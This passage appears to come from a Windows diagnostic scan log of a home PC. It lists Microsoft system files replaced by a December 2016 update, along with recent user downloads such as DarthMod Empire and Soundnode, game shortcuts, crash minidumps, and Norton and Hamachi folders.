2016-12-09 15:56 - 2016-11-11 07:06 - 02109952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2016-12-09 15:56 - 2016-11-11 07:06 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2016-12-09 15:56 - 2016-11-11 07:06 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2016-12-09 15:56 - 2016-11-11 07:05 - 04423680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-12-09 15:56 - 2016-11-11 07:05 - 03370496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2016-12-09 15:56 - 2016-11-11 07:04 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2016-12-09 15:56 - 2016-11-11 07:04 - 01992704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-12-09 15:56 - 2016-11-11 07:04 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-12-09 15:56 - 2016-11-11 07:04 - 01595392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-12-09 15:56 - 2016-11-11 07:04 - 00912896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2016-12-09 15:56 - 2016-11-11 07:04 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-12-09 15:56 - 2016-11-11 07:03 - 02484736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gameux.dll
2016-12-09 15:56 - 2016-11-11 07:03 - 02256384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-12-09 15:56 - 2016-11-11 07:03 - 01556480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2016-12-09 15:56 - 2016-11-11 07:03 - 00760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-12-09 15:56 - 2016-11-11 07:02 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2016-12-09 15:56 - 2016-11-11 07:01 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2016-12-09 15:55 - 2016-11-11 10:15 - 00101216 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceReactivation.dll
2016-12-09 15:55 - 2016-11-11 10:13 - 02213760 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-12-09 15:55 - 2016-11-11 10:08 - 00142176 _____ (Microsoft Corporation) C:\WINDOWS\system32\migisol.dll
2016-12-09 15:55 - 2016-11-11 10:03 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2016-12-09 15:55 - 2016-11-11 10:01 - 07219672 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-12-09 15:55 - 2016-11-11 10:01 - 02189152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-12-09 15:55 - 2016-11-11 10:01 - 01738048 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2016-12-09 15:55 - 2016-11-11 10:01 - 00658264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-12-09 15:55 - 2016-11-11 10:01 - 00401760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-12-09 15:55 - 2016-11-11 10:00 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-12-09 15:55 - 2016-11-11 10:00 - 00223584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2016-12-09 15:55 - 2016-11-11 09:59 - 02913136 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-12-09 15:55 - 2016-11-11 09:59 - 01267512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-12-09 15:55 - 2016-11-11 09:59 - 00433504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2016-12-09 15:55 - 2016-11-11 09:57 - 04130432 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-12-09 15:55 - 2016-11-11 09:57 - 01988560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-12-09 15:55 - 2016-11-11 09:57 - 01473048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2016-12-09 15:55 - 2016-11-11 09:56 - 04673304 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-12-09 15:55 - 2016-11-11 09:56 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-12-09 15:55 - 2016-11-11 09:56 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-12-09 15:55 - 2016-11-11 09:56 - 00187520 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudStorageWizard.exe
2016-12-09 15:55 - 2016-11-11 09:56 - 00126568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfaudiocnv.dll
2016-12-09 15:55 - 2016-11-11 09:55 - 01600624 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2016-12-09 15:55 - 2016-11-11 09:55 - 00882680 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2016-12-09 15:55 - 2016-11-11 09:55 - 00743224 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2016-12-09 15:55 - 2016-11-11 09:51 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2016-12-09 15:55 - 2016-11-11 09:31 - 22563840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-12-09 15:55 - 2016-11-11 09:28 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-12-09 15:55 - 2016-11-11 09:28 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CbtBackgroundManagerPolicy.dll
2016-12-09 15:55 - 2016-11-11 09:27 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetCfgNotifyObjectHost.exe
2016-12-09 15:55 - 2016-11-11 09:27 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpremove.exe
2016-12-09 15:55 - 2016-11-11 09:26 - 00042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\modem.sys
2016-12-09 15:55 - 2016-11-11 09:26 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgentc.exe
2016-12-09 15:55 - 2016-11-11 09:25 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\BcastDVRHelper.dll
2016-12-09 15:55 - 2016-11-11 09:25 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-12-09 15:55 - 2016-11-11 09:25 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-12-09 15:55 - 2016-11-11 09:25 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-12-09 15:55 - 2016-11-11 09:24 - 00226816 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-12-09 15:55 - 2016-11-11 09:24 - 00170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-12-09 15:55 - 2016-11-11 09:24 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll
2016-12-09 15:55 - 2016-11-11 09:24 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll
2016-12-09 15:55 - 2016-11-11 09:24 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2016-12-09 15:55 - 2016-11-11 09:23 - 00567296 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2016-12-09 15:55 - 2016-11-11 09:23 - 00380928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2016-12-09 15:55 - 2016-11-11 09:22 - 00489472 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-12-09 15:55 - 2016-11-11 09:22 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-12-09 15:55 - 2016-11-11 09:21 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-12-09 15:55 - 2016-11-11 09:21 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\vpnike.dll
2016-12-09 15:55 - 2016-11-11 09:21 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-12-09 15:55 - 2016-11-11 09:20 - 00657920 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-12-09 15:55 - 2016-11-11 09:20 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2016-12-09 15:55 - 2016-11-11 09:20 - 00446976 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-12-09 15:55 - 2016-11-11 09:20 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2016-12-09 15:55 - 2016-11-11 09:20 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-12-09 15:55 - 2016-11-11 09:20 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-12-09 15:55 - 2016-11-11 09:20 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupugc.exe
2016-12-09 15:55 - 2016-11-11 09:20 - 00115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\IdCtrls.dll
2016-12-09 15:55 - 2016-11-11 09:19 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-12-09 15:55 - 2016-11-11 09:19 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-12-09 15:55 - 2016-11-11 09:19 - 00495104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll
2016-12-09 15:55 - 2016-11-11 09:19 - 00388096 _____ (Microsoft Corporation) C:\WINDOWS\system32\zipfldr.dll
2016-12-09 15:55 - 2016-11-11 09:19 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapisrv.dll
2016-12-09 15:55 - 2016-11-11 09:19 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-12-09 15:55 - 2016-11-11 09:18 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-12-09 15:55 - 2016-11-11 09:18 - 00411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-12-09 15:55 - 2016-11-11 09:17 - 01002496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2016-12-09 15:55 - 2016-11-11 09:17 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvSysprep.dll
2016-12-09 15:55 - 2016-11-11 09:16 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2016-12-09 15:55 - 2016-11-11 09:16 - 01477632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsecedit.dll
2016-12-09 15:55 - 2016-11-11 09:16 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2016-12-09 15:55 - 2016-11-11 09:16 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\RjvMDMConfig.dll
2016-12-09 15:55 - 2016-11-11 09:15 - 00282624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-12-09 15:55 - 2016-11-11 09:15 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2016-12-09 15:55 - 2016-11-11 09:14 - 07654400 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-12-09 15:55 - 2016-11-11 09:14 - 03777536 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-12-09 15:55 - 2016-11-11 09:14 - 01589760 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2016-12-09 15:55 - 2016-11-11 09:14 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2016-12-09 15:55 - 2016-11-11 09:14 - 00178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppnp.dll
2016-12-09 15:55 - 2016-11-11 09:13 - 07812096 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-12-09 15:55 - 2016-11-11 09:13 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-12-09 15:55 - 2016-11-11 09:12 - 00870912 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtcprx.dll
2016-12-09 15:55 - 2016-11-11 09:11 - 23678464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-12-09 15:55 - 2016-11-11 09:11 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2016-12-09 15:55 - 2016-11-11 09:11 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpoext.dll
2016-12-09 15:55 - 2016-11-11 09:10 - 13084160 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-12-09 15:55 - 2016-11-11 09:10 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-12-09 15:55 - 2016-11-11 09:09 - 05111296 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2016-12-09 15:55 - 2016-11-11 09:09 - 01366016 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2016-12-09 15:55 - 2016-11-11 09:09 - 00164352 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialserver.dll
2016-12-09 15:55 - 2016-11-11 09:08 - 08127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-12-09 15:55 - 2016-11-11 09:07 - 03441152 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2016-12-09 15:55 - 2016-11-11 09:07 - 02953216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2016-12-09 15:55 - 2016-11-11 09:07 - 02009600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2016-12-09 15:55 - 2016-11-11 09:07 - 01691136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2016-12-09 15:55 - 2016-11-11 09:07 - 01060864 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-12-09 15:55 - 2016-11-11 09:06 - 03400192 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncCenter.dll
2016-12-09 15:55 - 2016-11-11 09:05 - 01779712 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-12-09 15:55 - 2016-11-11 09:05 - 01490944 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-12-09 15:55 - 2016-11-11 09:05 - 01031680 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-12-09 15:55 - 2016-11-11 09:05 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-12-09 15:55 - 2016-11-11 09:04 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2016-12-09 15:55 - 2016-11-11 09:04 - 04746752 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-12-09 15:55 - 2016-11-11 09:04 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-12-09 15:55 - 2016-11-11 09:04 - 02611200 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameux.dll
2016-12-09 15:55 - 2016-11-11 09:04 - 02317312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-12-09 15:55 - 2016-11-11 09:04 - 01709056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2016-12-09 15:55 - 2016-11-11 09:04 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll
2016-12-09 15:55 - 2016-11-11 09:04 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\system32\stobject.dll
2016-12-09 15:55 - 2016-11-11 09:03 - 04708864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-12-09 15:55 - 2016-11-11 09:03 - 02669056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-12-09 15:55 - 2016-11-11 09:03 - 02287616 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-12-09 15:55 - 2016-11-11 09:03 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-12-09 15:55 - 2016-11-11 09:03 - 00905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-12-09 15:55 - 2016-11-11 09:03 - 00632320 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2016-12-09 15:55 - 2016-11-11 09:03 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-12-09 15:55 - 2016-11-11 09:03 - 00283648 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkssvc.dll
2016-12-09 15:55 - 2016-11-11 09:02 - 00936448 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-12-09 15:55 - 2016-11-11 09:02 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-12-09 15:55 - 2016-11-11 08:01 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2016-12-09 15:55 - 2016-11-11 08:01 - 01969912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll
2016-12-09 15:55 - 2016-11-11 08:01 - 00167848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscapi.dll
2016-12-09 15:55 - 2016-11-11 08:00 - 01706488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-12-09 15:55 - 2016-11-11 07:54 - 00122208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\migisol.dll
2016-12-09 15:55 - 2016-11-11 07:49 - 00869848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2016-12-09 15:55 - 2016-11-11 07:49 - 00248480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2016-12-09 15:55 - 2016-11-11 07:47 - 05722832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-12-09 15:55 - 2016-11-11 07:47 - 01430720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-12-09 15:55 - 2016-11-11 07:47 - 00861024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2016-12-09 15:55 - 2016-11-11 07:45 - 02166752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-12-09 15:55 - 2016-11-11 07:45 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-12-09 15:55 - 2016-11-11 07:42 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-12-09 15:55 - 2016-11-11 07:42 - 06668032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-12-09 15:55 - 2016-11-11 07:42 - 00959112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-12-09 15:55 - 2016-11-11 07:42 - 00374448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFPlay.dll
2016-12-09 15:55 - 2016-11-11 07:41 - 04311736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-12-09 15:55 - 2016-11-11 07:27 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetCfgNotifyObjectHost.exe
2016-12-09 15:55 - 2016-11-11 07:26 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgentc.exe
2016-12-09 15:55 - 2016-11-11 07:24 - 00519168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ngccredprov.dll
2016-12-09 15:55 - 2016-11-11 07:22 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll
2016-12-09 15:55 - 2016-11-11 07:21 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-12-09 15:55 - 2016-11-11 07:21 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.BackgroundManagerPolicy.dll
2016-12-09 15:55 - 2016-11-11 07:20 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-12-09 15:55 - 2016-11-11 07:20 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-12-09 15:55 - 2016-11-11 07:20 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-12-09 15:55 - 2016-11-11 07:20 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2016-12-09 15:55 - 2016-11-11 07:20 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2016-12-09 15:55 - 2016-11-11 07:19 - 00364544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-12-09 15:55 - 2016-11-11 07:19 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupugc.exe
2016-12-09 15:55 - 2016-11-11 07:18 - 01196544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2016-12-09 15:55 - 2016-11-11 07:18 - 00318464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFolder.dll
2016-12-09 15:55 - 2016-11-11 07:18 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscinterop.dll
2016-12-09 15:55 - 2016-11-11 07:17 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2016-12-09 15:55 - 2016-11-11 07:16 - 19415552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-12-09 15:55 - 2016-11-11 07:16 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-12-09 15:55 - 2016-11-11 07:16 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-12-09 15:55 - 2016-11-11 07:15 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptngc.dll
2016-12-09 15:55 - 2016-11-11 07:14 - 19415552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-12-09 15:55 - 2016-11-11 07:14 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2016-12-09 15:55 - 2016-11-11 07:13 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2016-12-09 15:55 - 2016-11-11 07:13 - 00165376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2016-12-09 15:55 - 2016-11-11 07:12 - 00259584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdtcuiu.dll
2016-12-09 15:55 - 2016-11-11 07:10 - 12177920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-12-09 15:55 - 2016-11-11 07:10 - 00746496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdtcprx.dll
2016-12-09 15:55 - 2016-11-11 07:09 - 03196416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2016-12-09 15:55 - 2016-11-11 07:08 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xolehlp.dll
2016-12-09 15:55 - 2016-11-11 07:06 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-12-09 15:55 - 2016-11-11 07:06 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2016-12-09 15:55 - 2016-11-11 07:06 - 00359936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxclu.dll
2016-12-09 15:55 - 2016-11-11 07:05 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-12-09 15:55 - 2016-11-11 07:04 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2016-12-09 15:55 - 2016-11-11 07:04 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\stobject.dll
2016-12-09 15:55 - 2016-11-11 07:03 - 01576448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2016-12-09 15:55 - 2016-11-11 07:03 - 00772608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntshrui.dll
2016-12-09 15:55 - 2016-11-11 07:03 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2016-12-09 15:55 - 2016-11-11 07:03 - 00565248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2016-12-09 15:55 - 2016-11-11 06:40 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2016-12-08 19:49 - 2016-12-08 19:49 - 00000222 _____ C:\Users\Nathan\Desktop\Out of the Park Baseball 15.url
2016-12-07 22:25 - 2016-12-07 22:25 - 00000000 ____D C:\Users\Nathan\AppData\Local\Macromedia
2016-12-07 20:01 - 2016-12-07 20:02 - 39626026 _____ C:\Users\Nathan\Downloads\Soundnode (1).zip
2016-12-02 16:37 - 2016-12-02 16:38 - 00000000 ____D C:\Users\Nathan\Desktop\Police
2016-11-27 21:17 - 2016-11-27 21:17 - 00437604 _____ C:\WINDOWS\Minidump\112716-3953-01.dmp
2016-11-27 00:40 - 2016-11-27 00:40 - 00432244 _____ C:\WINDOWS\Minidump\112716-3890-01.dmp
2016-11-26 23:55 - 2016-11-26 23:55 - 00000233 _____ C:\Users\Nathan\Desktop\Tom Clancy's Rainbow Six Siege.url
2016-11-25 19:28 - 2016-11-25 19:28 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\Lonely Troops
2016-11-24 22:26 - 2016-11-24 22:26 - 00434732 _____ C:\WINDOWS\Minidump\112416-3796-01.dmp
2016-11-24 21:21 - 2016-11-24 21:21 - 00480572 _____ C:\WINDOWS\Minidump\112416-4218-01.dmp
2016-11-24 21:00 - 2016-11-24 21:05 - 00002672 _____ C:\Users\Nathan\Desktop\DarthMod Empire.lnk
2016-11-24 21:00 - 2016-11-24 21:05 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DarthMod Empire
2016-11-24 21:00 - 2016-11-24 21:00 - 00002724 _____ C:\Users\Nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DarthMod Empire.lnk
2016-11-24 20:58 - 2012-09-16 21:58 - 1016997827 _____ C:\Users\Nathan\Downloads\DarthMod_Empire_v8.0_Platinum.2
2016-11-24 20:45 - 2016-11-24 21:01 - 21211340 _____ (DarthMod Productions) C:\Users\Nathan\Downloads\DarthMod_Empire_v8.0.1_Patch_Platinum_Final.exe
2016-11-24 20:45 - 2016-11-24 20:55 - 2000000000 _____ (DarthMod Productions) C:\Users\Nathan\Downloads\DarthMod_Empire_v8.0_Platinum.exe
2016-11-24 20:45 - 2016-11-24 20:51 - 1017288122 _____ C:\Users\Nathan\Downloads\DarthMod_Empire_v8.0_Platinum.zip
2016-11-23 22:04 - 2016-12-11 15:58 - 00000000 ____D C:\Users\Nathan\AppData\Local\Soundnode
2016-11-23 22:03 - 2016-11-23 22:14 - 39506404 _____ C:\Users\Nathan\Downloads\Soundnode.zip
2016-11-23 22:03 - 2016-11-23 22:03 - 39626026 _____ C:\Users\Nathan\Downloads\Unconfirmed 878221.crdownload
2016-11-23 17:58 - 2016-12-12 14:13 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton 360
2016-11-23 17:57 - 2016-11-17 13:45 - 00101824 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2016-11-23 17:57 - 2016-11-17 13:45 - 00091584 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2016-11-23 17:54 - 2016-11-23 17:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Hamachi
2016-11-23 17:54 - 2016-11-23 17:54 - 00000000 ____D C:\Program Files (x86)\LogMeIn Hamachi
